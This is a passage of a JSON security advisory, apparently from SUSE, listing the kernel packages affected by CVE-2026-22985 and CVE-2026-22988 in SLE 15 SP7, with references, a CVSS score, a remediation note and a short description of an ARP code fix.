"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22985",
"url": "https://www.suse.com/security/cve/CVE-2026-22985"
},
{
"category": "external",
"summary": "SUSE Bug 1257277 for CVE-2026-22985",
"url": "https://bugzilla.suse.com/1257277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-22985"
},
{
"cve": "CVE-2026-22988",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22988"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narp: do not assume dev_hard_header() does not change skb-\u003ehead\n\narp_create() is the only dev_hard_header() caller\nmaking assumption about skb-\u003ehead being unchanged.\n\nA recent commit broke this assumption.\n\nInitialize @arp pointer after dev_hard_header() call.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22988",
"url": "https://www.suse.com/security/cve/CVE-2026-22988"
},
{
"category": "external",
"summary": "SUSE Bug 1257282 for CVE-2026-22988",
"url": "https://bugzilla.suse.com/1257282"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
